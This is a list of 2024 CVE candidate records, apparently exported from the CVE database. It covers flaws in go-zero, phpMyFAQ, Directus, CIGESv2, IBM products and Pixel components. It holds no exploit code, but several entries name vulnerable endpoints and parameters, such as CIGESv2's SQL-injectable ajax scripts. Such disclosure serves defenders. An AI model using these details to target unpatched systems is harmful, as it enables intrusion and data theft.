CVE    2024    27302    Candidate    go-zero is a web and rpc framework. Go-zero allows user to specify a CORS Filter with a configurable allows param - which is an array of domains allowed in CORS policy. However, the `isOriginAllowed` uses `strings.HasSuffix` to check the origin, which leads to bypass via a malicious domain. This vulnerability is capable of breaking CORS policy and thus allowing any page to make requests and/or retrieve data on behalf of other users. Version 1.4.4 fixes this issue.    MISC:https://github.com/zeromicro/go-zero/commit/d9d79e930dff6218a873f4f02115df61c38b15db   |   URL:https://github.com/zeromicro/go-zero/commit/d9d79e930dff6218a873f4f02115df61c38b15db   |   MISC:https://github.com/zeromicro/go-zero/security/advisories/GHSA-fgxv-gw55-r5fq   |   URL:https://github.com/zeromicro/go-zero/security/advisories/GHSA-fgxv-gw55-r5fq    Assigned (20240222)
CVE    2024    27301    Candidate    Support App is an opensource application specialized in managing Apple devices. It's possible to abuse a vulnerability inside the postinstall installer script to make the installer execute arbitrary code as root. The cause of the vulnerability is the fact that the shebang `#!/bin/zsh` is being used. When the installer is executed it asks for the user's password to be executed as root. However, it'll still be using the $HOME of the user and therefore loading the file `$HOME/.zshenv` when the `postinstall` script is executed. An attacker could add malicious code to `$HOME/.zshenv` and it will be executed when the app is installed. An attacker may leverage this vulnerability to escalate privilege on the system. This issue has been addressed in version 2.5.1 Rev 2. All users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/root3nl/SupportApp/commit/e866b2aa4028f6a982977f462c0f7550d952c5d0   |   URL:https://github.com/root3nl/SupportApp/commit/e866b2aa4028f6a982977f462c0f7550d952c5d0   |   MISC:https://github.com/root3nl/SupportApp/security/advisories/GHSA-jr78-247f-rhqc   |   URL:https://github.com/root3nl/SupportApp/security/advisories/GHSA-jr78-247f-rhqc    Assigned (20240222)
CVE    2024    27300    Candidate    phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. The `email` field in phpMyFAQ's user control panel page is vulnerable to stored XSS attacks due to the inadequacy of PHP's `FILTER_VALIDATE_EMAIL` function, which only validates the email format, not its content. This vulnerability enables an attacker to execute arbitrary client-side JavaScript within the context of another user's phpMyFAQ session. This vulnerability is fixed in 3.2.6.    MISC:https://github.com/thorsten/phpMyFAQ/commit/09336b0ff0e0a04aa0c97c5975651af4769d2459   |   URL:https://github.com/thorsten/phpMyFAQ/commit/09336b0ff0e0a04aa0c97c5975651af4769d2459   |   MISC:https://github.com/thorsten/phpMyFAQ/commit/de90315c9bd4ead5fe6ba5586f6b016843aa8209   |   URL:https://github.com/thorsten/phpMyFAQ/commit/de90315c9bd4ead5fe6ba5586f6b016843aa8209   |   MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-q7g6-xfh2-vhpx   |   URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-q7g6-xfh2-vhpx    Assigned (20240222)
CVE    2024    27299    Candidate    phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. A SQL injection vulnerability has been discovered in the "Add News" functionality due to improper escaping of the email address. This allows any authenticated user with the rights to add/edit FAQ news to exploit this vulnerability to exfiltrate data, take over accounts and in some cases, even achieve RCE. The vulnerable field lies in the `authorEmail` field which uses PHP's `FILTER_VALIDATE_EMAIL` filter. This filter is insufficient in protecting against SQL injection attacks and should still be properly escaped. However, in this version of phpMyFAQ (3.2.5), this field is not escaped properly and can be used together with other fields to fully exploit the SQL injection vulnerability. This vulnerability is fixed in 3.2.6.    MISC:https://drive.google.com/drive/folders/1BFL8GHIBxSUxu0TneYf66KjFA0A4RZga?usp=sharing   |   URL:https://drive.google.com/drive/folders/1BFL8GHIBxSUxu0TneYf66KjFA0A4RZga?usp=sharing   |   MISC:https://github.com/thorsten/phpMyFAQ/commit/1b68a5f89fb65996c56285fa636b818de8608011   |   URL:https://github.com/thorsten/phpMyFAQ/commit/1b68a5f89fb65996c56285fa636b818de8608011   |   MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-qgxx-4xv5-6hcw   |   URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-qgxx-4xv5-6hcw    Assigned (20240222)
CVE    2024    27298    Candidate    parse-server is a Parse Server for Node.js / Express. This vulnerability allows SQL injection when Parse Server is configured to use the PostgreSQL database. The vulnerability has been fixed in 6.5.0 and 7.0.0-alpha.20.    MISC:https://github.com/parse-community/parse-server/commit/a6e654943536932904a69b51e513507fcf90a504   |   URL:https://github.com/parse-community/parse-server/commit/a6e654943536932904a69b51e513507fcf90a504   |   MISC:https://github.com/parse-community/parse-server/commit/cbefe770a7260b54748a058b8a7389937dc35833   |   URL:https://github.com/parse-community/parse-server/commit/cbefe770a7260b54748a058b8a7389937dc35833   |   MISC:https://github.com/parse-community/parse-server/releases/tag/6.5.0   |   URL:https://github.com/parse-community/parse-server/releases/tag/6.5.0   |   MISC:https://github.com/parse-community/parse-server/releases/tag/7.0.0-alpha.20   |   URL:https://github.com/parse-community/parse-server/releases/tag/7.0.0-alpha.20   |   MISC:https://github.com/parse-community/parse-server/security/advisories/GHSA-6927-3vr9-fxf2   |   URL:https://github.com/parse-community/parse-server/security/advisories/GHSA-6927-3vr9-fxf2    Assigned (20240222)
CVE    2024    27297    Candidate    Nix is a package manager for Linux and other Unix systems. A fixed-output derivation on Linux can send file descriptors to files in the Nix store to another program running on the host (or another fixed-output derivation) via Unix domain sockets in the abstract namespace. This allows the output of the derivation to be modified after Nix has registered the path as "valid" and immutable in the Nix database. In particular, this allows the output of fixed-output derivations to be modified from their expected content. This issue has been addressed in versions 2.3.18, 2.18.2, 2.19.4 and 2.20.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/NixOS/nix/commit/f8170ce9f119e5e6724eb81ff1b5a2d4c0024000   |   URL:https://github.com/NixOS/nix/commit/f8170ce9f119e5e6724eb81ff1b5a2d4c0024000   |   MISC:https://github.com/NixOS/nix/security/advisories/GHSA-2ffj-w4mj-pg37   |   URL:https://github.com/NixOS/nix/security/advisories/GHSA-2ffj-w4mj-pg37   |   MISC:https://hackmd.io/03UGerewRcy3db44JQoWvw   |   URL:https://hackmd.io/03UGerewRcy3db44JQoWvw    Assigned (20240222)
CVE    2024    27296    Candidate    Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 10.8.3, the exact Directus version number was being shipped in compiled JS bundles which are accessible without authentication. With this information a malicious attacker can trivially look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version. The problem has been resolved in versions 10.8.3 and newer.    MISC:https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0   |   URL:https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0   |   MISC:https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j   |   URL:https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j    Assigned (20240222)
CVE    2024    27295    Candidate    Directus is a real-time API and App dashboard for managing SQL database content. The password reset mechanism of the Directus backend allows attackers to receive a password reset email of a victim user, specifically having it arrive at an email address similar to the victim's, with one or more characters changed to use accents. This is because MySQL/MariaDB are configured by default for accent-insensitive and case-insensitive comparisons. This vulnerability is fixed in version 10.8.3.    MISC:https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5   |   URL:https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5    Assigned (20240222)
CVE    2024    27294    Candidate    dp-golang is a Puppet module for Go installations. Prior to 1.2.7, dp-golang could install files — including the compiler binary — with the wrong ownership when Puppet was run as root and the installed package was On macOS: Go version 1.4.3 through 1.21rc3, inclusive, go1.4-bootstrap-20170518.tar.gz, or go1.4-bootstrap-20170531.tar.gz. The user and group specified in Puppet code were ignored for files within the archive. dp-puppet version 1.2.7 will recreate installations if the owner or group of any file or directory within that installation does not match the requested owner or group    MISC:https://github.com/danielparks/puppet-golang/commit/1d0865b24071cb1c00d2fd8cb755d444e6e8f888   |   URL:https://github.com/danielparks/puppet-golang/commit/1d0865b24071cb1c00d2fd8cb755d444e6e8f888   |   MISC:https://github.com/danielparks/puppet-golang/commit/870724a7fef50208515da7bbfa9dfd5d6950e7f5   |   URL:https://github.com/danielparks/puppet-golang/commit/870724a7fef50208515da7bbfa9dfd5d6950e7f5   |   MISC:https://github.com/danielparks/puppet-golang/security/advisories/GHSA-8h8m-h98f-vv84   |   URL:https://github.com/danielparks/puppet-golang/security/advisories/GHSA-8h8m-h98f-vv84    Assigned (20240222)
CVE    2024    27292    Candidate    Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.    MISC:https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9   |   URL:https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9   |   MISC:https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv   |   URL:https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv    Assigned (20240222)
CVE    2024    27291    Candidate    Docassemble is an expert system for guided interviews and document assembly. Prior to 1.4.97, it is possible to create a URL that acts as an open redirect. The vulnerability has been patched in version 1.4.97 of the master branch.    MISC:https://github.com/jhpyle/docassemble/commit/4801ac7ff7c90df00ac09523077930cdb6dea2aa   |   URL:https://github.com/jhpyle/docassemble/commit/4801ac7ff7c90df00ac09523077930cdb6dea2aa   |   MISC:https://github.com/jhpyle/docassemble/security/advisories/GHSA-7wxf-r2qv-9xwr   |   URL:https://github.com/jhpyle/docassemble/security/advisories/GHSA-7wxf-r2qv-9xwr    Assigned (20240222)
CVE    2024    27290    Candidate    Docassemble is an expert system for guided interviews and document assembly. Prior to 1.4.97, a user could type HTML into a field, including the field for the user's name, and then that HTML could be displayed on the screen as HTML. The vulnerability has been patched in version 1.4.97 of the master branch.    MISC:https://github.com/jhpyle/docassemble/commit/4801ac7ff7c90df00ac09523077930cdb6dea2aa   |   URL:https://github.com/jhpyle/docassemble/commit/4801ac7ff7c90df00ac09523077930cdb6dea2aa   |   MISC:https://github.com/jhpyle/docassemble/security/advisories/GHSA-pcfx-g2j2-f6f6   |   URL:https://github.com/jhpyle/docassemble/security/advisories/GHSA-pcfx-g2j2-f6f6    Assigned (20240222)
CVE    2024    27289    Candidate    pgx is a PostgreSQL driver and toolkit for Go. Prior to version 4.18.2, SQL injection can occur when all of the following conditions are met: the non-default simple protocol is used; a placeholder for a numeric value must be immediately preceded by a minus; there must be a second placeholder for a string value after the first placeholder; both must be on the same line; and both parameter values must be user-controlled. The problem is resolved in v4.18.2. As a workaround, do not use the simple protocol or do not place a minus directly before a placeholder.    MISC:https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df   |   URL:https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df   |   MISC:https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p   |   URL:https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p    Assigned (20240222)
CVE    2024    27288    Candidate    1Panel is an open source Linux server operation and maintenance management panel. Prior to version 1.10.1-lts, users can use Burp to obtain unauthorized access to the console page. The vulnerability has been fixed in v1.10.1-lts. There are no known workarounds.    MISC:https://github.com/1Panel-dev/1Panel/releases/tag/v1.10.1-lts   |   URL:https://github.com/1Panel-dev/1Panel/releases/tag/v1.10.1-lts   |   MISC:https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-26w3-q4j8-4xjp   |   URL:https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-26w3-q4j8-4xjp    Assigned (20240222)
CVE    2024    27287    Candidate    ESPHome is a system to control your ESP8266/ESP32 for Home Automation systems. Starting in version 2023.12.9 and prior to version 2024.2.2, the edit configuration file API in the dashboard component of ESPHome version 2023.12.9 (command line installation and Home Assistant add-on) serves unsanitized data with `Content-Type: text/html; charset=UTF-8`, allowing a remote authenticated user to inject arbitrary web script and exfiltrate session cookies via cross-site scripting. A malicious authenticated user can inject arbitrary JavaScript into configuration files using a POST request to the /edit endpoint; the configuration parameter specifies the file to write. To trigger the XSS vulnerability, the victim must visit the page `/edit?configuration=[xss file]`. By abusing this vulnerability, a malicious actor could perform operations on the dashboard on behalf of a logged-in user, access sensitive information, create, edit and delete configuration files, and flash firmware on managed boards. In addition to this, cookies are not correctly secured, allowing the exfiltration of session cookie values. Version 2024.2.2 contains a patch for this issue.    MISC:https://github.com/esphome/esphome/commit/37d2b3c7977a4ccbec59726ca7549cb776661455   |   URL:https://github.com/esphome/esphome/commit/37d2b3c7977a4ccbec59726ca7549cb776661455   |   MISC:https://github.com/esphome/esphome/security/advisories/GHSA-9p43-hj5j-96h5   |   URL:https://github.com/esphome/esphome/security/advisories/GHSA-9p43-hj5j-96h5    Assigned (20240222)
CVE    2024    27286    Candidate    Zulip is an open-source team collaboration. When a user moves a Zulip message, they have the option to move all messages in the topic, move only subsequent messages as well, or move just a single message. If the user chose to just move one message, and was moving it from a public stream to a private stream, Zulip would successfully move the message, but active users who did not have access to the private stream, but whose client had already received the message, would continue to see the message in the public stream until they reloaded their client. Additionally, Zulip did not remove view permissions on the message from recently-active users, allowing the message to show up in the "All messages" view or in search results, but not in "Inbox" or "Recent conversations" views. While the bug has been present since moving messages between streams was first introduced in version 3.0, this option became much more common starting in Zulip 8.0, when the default option in the picker for moving the very last message in a conversation was changed. This issue is fixed in Zulip Server 8.3. No known workarounds are available.    MISC:https://github.com/zulip/zulip/commit/3db1733310ddd944c2e690ba673232345c928eec   |   URL:https://github.com/zulip/zulip/commit/3db1733310ddd944c2e690ba673232345c928eec   |   MISC:https://github.com/zulip/zulip/security/advisories/GHSA-478x-rfqr-w4jf   |   URL:https://github.com/zulip/zulip/security/advisories/GHSA-478x-rfqr-w4jf    Assigned (20240222)
CVE    2024    27285    Candidate    YARD is a Ruby Documentation tool. The "frames.html" file within the Yard Doc's generated documentation is vulnerable to Cross-Site Scripting (XSS) attacks due to inadequate sanitization of user input within the JavaScript segment of the "frames.erb" template file. This vulnerability is fixed in 0.9.36.    FEDORA:FEDORA-2024-3744975c4b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MR3Z2E2UIZZ7YOR7R645EVSBGWMB2RGA/   |   MISC:https://github.com/lsegal/yard/commit/1fcb2d8b316caf8779cfdcf910715e9ab583f0aa   |   URL:https://github.com/lsegal/yard/commit/1fcb2d8b316caf8779cfdcf910715e9ab583f0aa   |   MISC:https://github.com/lsegal/yard/commit/2069e2bf08293bda2fcc78f7d0698af6354054be   |   URL:https://github.com/lsegal/yard/commit/2069e2bf08293bda2fcc78f7d0698af6354054be   |   MISC:https://github.com/lsegal/yard/pull/1538   |   URL:https://github.com/lsegal/yard/pull/1538   |   MISC:https://github.com/lsegal/yard/security/advisories/GHSA-8mq4-9jjh-9xrc   |   URL:https://github.com/lsegal/yard/security/advisories/GHSA-8mq4-9jjh-9xrc   |   MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/yard/CVE-2024-27285.yml   |   URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/yard/CVE-2024-27285.yml   |   MLIST:[debian-lts-announce] 20240306 [SECURITY] [DLA 3753-1] yard security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00006.html    Assigned (20240222)
CVE    2024    27284    Candidate    cassandra-rs is a Cassandra (CQL) driver for Rust. Code that attempts to use an item (e.g., a row) returned by an iterator after the iterator has advanced to the next item will be accessing freed memory and experience undefined behaviour. The problem has been fixed in version 3.0.0.    MISC:https://github.com/Metaswitch/cassandra-rs/commit/ae054dc8044eac9c2c7ae2b1ab154b53ca7f8df7   |   URL:https://github.com/Metaswitch/cassandra-rs/commit/ae054dc8044eac9c2c7ae2b1ab154b53ca7f8df7   |   MISC:https://github.com/Metaswitch/cassandra-rs/security/advisories/GHSA-x9xc-63hg-vcfq   |   URL:https://github.com/Metaswitch/cassandra-rs/security/advisories/GHSA-x9xc-63hg-vcfq    Assigned (20240222)
CVE    2024    27283    Candidate    A vulnerability was discovered in Veritas eDiscovery Platform before 10.2.5. The application administrator can upload potentially malicious files to arbitrary locations on the server on which the application is installed.    MISC:https://www.veritas.com/support/en_US/security/VTS23-020    Assigned (20240222)
CVE    2024    2728    Candidate    Information exposure vulnerability in the CIGESv2 system. This vulnerability could allow a local attacker to intercept traffic due to the lack of proper implementation of the TLS protocol.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system    Assigned (20240320)
CVE    2024    27279    Candidate    Directory traversal vulnerability exists in a-blog cms Ver.3.1.x series Ver.3.1.9 and earlier, Ver.3.0.x series Ver.3.0.30 and earlier, Ver.2.11.x series Ver.2.11.59 and earlier, Ver.2.10.x series Ver.2.10.51 and earlier, and Ver.2.9 and earlier versions. If this vulnerability is exploited, a user with editor or higher privilege who can login to the product may obtain arbitrary files on the server including password files.    MISC:https://developer.a-blogcms.jp/blog/news/JVN-48443978.html   |   URL:https://developer.a-blogcms.jp/blog/news/JVN-48443978.html   |   MISC:https://jvn.jp/en/jp/JVN48443978/   |   URL:https://jvn.jp/en/jp/JVN48443978/    Assigned (20240222)
CVE    2024    27278    Candidate    OpenPNE Plugin "opTimelinePlugin" 1.2.11 and earlier contains a cross-site scripting vulnerability. On the site which uses the affected product, when a user configures the profile with some malicious contents, an arbitrary script may be executed on the web browsers of other users.    MISC:http://www.openpne.jp/archives/13458/   |   URL:http://www.openpne.jp/archives/13458/   |   MISC:https://jvn.jp/en/jp/JVN78084105/   |   URL:https://jvn.jp/en/jp/JVN78084105/    Assigned (20240222)
CVE    2024    27277    Candidate    The private key for the IBM Storage Protect Plus Server 10.1.0 through 10.1.16 certificate can be disclosed, undermining the security of the certificate. IBM X-Force ID: 285205.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/285205   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/285205   |   MISC:https://www.ibm.com/support/pages/node/7144861   |   URL:https://www.ibm.com/support/pages/node/7144861    Assigned (20240222)
CVE    2024    2727    Candidate    HTML injection vulnerability affecting the CIGESv2 system, which allows an attacker to inject arbitrary code and modify elements of the website and email confirmation message.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system    Assigned (20240320)
CVE    2024    27266    Candidate    IBM Maximo Application Suite 7.6.1.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 284566.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/284566   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/284566   |   MISC:https://www.ibm.com/support/pages/node/7141270   |   URL:https://www.ibm.com/support/pages/node/7141270    Assigned (20240222)
CVE    2024    27265    Candidate    IBM Integration Bus for z/OS 10.1 through 10.1.0.3 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 284564.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/284564   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/284564   |   MISC:https://www.ibm.com/support/pages/node/7140678   |   URL:https://www.ibm.com/support/pages/node/7140678    Assigned (20240222)
CVE    2024    2726    Candidate    Stored Cross-Site Scripting (Stored-XSS) vulnerability affecting the CIGESv2 system, allowing an attacker to execute and store malicious javascript code in the application form without prior registration.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system    Assigned (20240320)
CVE    2024    27255    Candidate    IBM MQ Operator 2.0.0 LTS, 2.0.18 LTS, 3.0.0 CD, 3.0.1 CD, 2.4.0 through 2.4.7, 2.3.0 through 2.3.3, 2.2.0 through 2.2.2, and 2.3.0 through 2.3.3 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 283905.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/283905   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/283905   |   MISC:https://www.ibm.com/support/pages/node/7126571   |   URL:https://www.ibm.com/support/pages/node/7126571    Assigned (20240222)
CVE    2024    2725    Candidate    Information exposure vulnerability in the CIGESv2 system. A remote attacker might be able to access /vendor/composer/installed.json and retrieve all installed packages used by the application.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system    Assigned (20240320)
CVE    2024    2724    Candidate    SQL injection vulnerability in the CIGESv2 system, through /ajaxServiciosAtencion.php, in the 'idServicio' parameter. The exploitation of this vulnerability could allow a remote user to retrieve all data stored in the database by sending a specially crafted SQL query.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system    Assigned (20240320)
CVE    2024    27237    Candidate    In wipe_ns_memory of nsmemwipe.c, there is a possible incorrect size calculation due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27236    Candidate    In aoc_unlocked_ioctl of aoc.c, there is a possible memory corruption due to type confusion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27235    Candidate    In plugin_extern_func of , there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27234    Candidate    In fvp_set_target of fvp.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27233    Candidate    In ppcfw_init_secpolicy of ppcfw.c, there is a possible permission bypass due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27230    Candidate    In ProtocolPsKeepAliveStatusAdapter::getCode() of protocolpsadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    2723    Candidate    SQL injection vulnerability in the CIGESv2 system, through /ajaxSubServicios.php, in the 'idServicio' parameter. The exploitation of this vulnerability could allow a remote user to retrieve all data stored in the database by sending a specially crafted SQL query.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system    Assigned (20240320)
CVE    2024    27229    Candidate    In ss_SendCallBarringPwdRequiredIndMsg of ss_CallBarring.c, there is a possible null pointer deref due to a missing null check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27228    Candidate    There is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27227    Candidate    A malicious DNS response can trigger a number of OOB reads, writes, and other memory issues    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27226    Candidate    In tmu_config_gov_params of , there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27225    Candidate    In sendHciCommand of bluetooth_hci.cc, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27224    Candidate    In strncpy of strncpy.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27223    Candidate    In EUTRAN_LCS_DecodeFacilityInformationElement of LPP_LcsManagement.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure after authenticating the cell connection with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27222    Candidate    In onSkipButtonClick of FaceEnrollFoldPage.java, there is a possible way to access the file the app cannot access due to Intent Redirect GRANT_URI_PERMISSIONS Attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27221    Candidate    In update_policy_data of , there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27220    Candidate    In lpm_req_handler of , there is a possible out of bounds memory access due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    2722    Candidate    SQL injection vulnerability in the CIGESv2 system, through /ajaxConfigTotem.php, in the 'id' parameter. The exploitation of this vulnerability could allow a remote user to retrieve all data stored in the database by sending a specially crafted SQL query.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system    Assigned (20240320)
CVE    2024    27219    Candidate    In tmu_set_pi of tmu.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27218    Candidate    In update_freq_data of , there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27215    Candidate    ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-1709. Reason: This candidate is a duplicate of CVE-2024-1709. Notes: All CVE users should reference CVE-2024-1709 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.        Assigned (20240221)
CVE    2024    27213    Candidate    In BroadcastSystemMessage of servicemgr.cpp, there is a possible Remote Code Execution due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27212    Candidate    In init_data of , there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27211    Candidate    In AtiHandleAPOMsgType of ati_Main.c, there is a possible OOB write due to a missing null check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27210    Candidate    In policy_check of fvp.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
